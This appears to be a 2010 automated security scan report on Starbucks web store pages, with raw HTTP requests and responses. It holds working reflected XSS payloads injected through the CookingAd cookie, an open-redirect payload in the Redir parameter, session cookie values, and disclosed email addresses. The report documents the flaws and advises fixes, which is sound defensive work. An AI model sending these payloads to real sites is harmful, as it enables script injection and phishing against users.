GET /starbucks-gifts HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17245 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:01 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17245 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:45 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-reserve HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29291 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:31 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... ve Coffee Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Reserve Coffee Page" var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-reserve/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79452 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:35 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79452 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:46:17 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-via HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32239 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:29 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... eName="Starbucks VIA Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks VIA Page" var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-via/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tea HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26007 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:58 GMT Connection: close
<head> <title>Tea at Starbucks Store</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> ...[SNIP]... ageName="Tazo Tea HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Tazo Tea HomePage" var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D" var s_prop4="" var s_prop5="" var s_prop6="/tea/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state= ...[SNIP]...
4. Session token in URLpreviousnext There are 2 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 360 Content-Type: text/html Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:30 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750 ...[SNIP]...
6. Cookie without HttpOnly flag setpreviousnext There are 11 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&Redir=">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&Redir=">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /guestassist/shcontus.asp?error=noselection HTTP/1.1 Host: www.starbucksstore.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 164 Content-Type: text/html Location: /guestassist/shcontus.asp?error=noselection Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=HABAELCBHLOMNPJNKIPJJFHG; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:22:10 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21102 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:05 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21201 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:50 GMT Connection: close
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The application appears to disclose some server-side source code written in ASP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
info@mystarbucksidea.com
starbuckscardmobile@starbucks.com
Request
GET /customer-service/faqs/coffeehouse HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:18:08 GMT Connection: close Content-Length: 57890
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p> ...[SNIP]... <a href="mailto:info@mystarbucksidea.com"> ...[SNIP]...
The following email address was disclosed in the response:
brian@cherne.net
Request
GET /static/js/global.js HTTP/1.1 Host: www.starbucks.com Proxy-Connection: keep-alive Referer: http://www.starbucks.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; skin=
Response
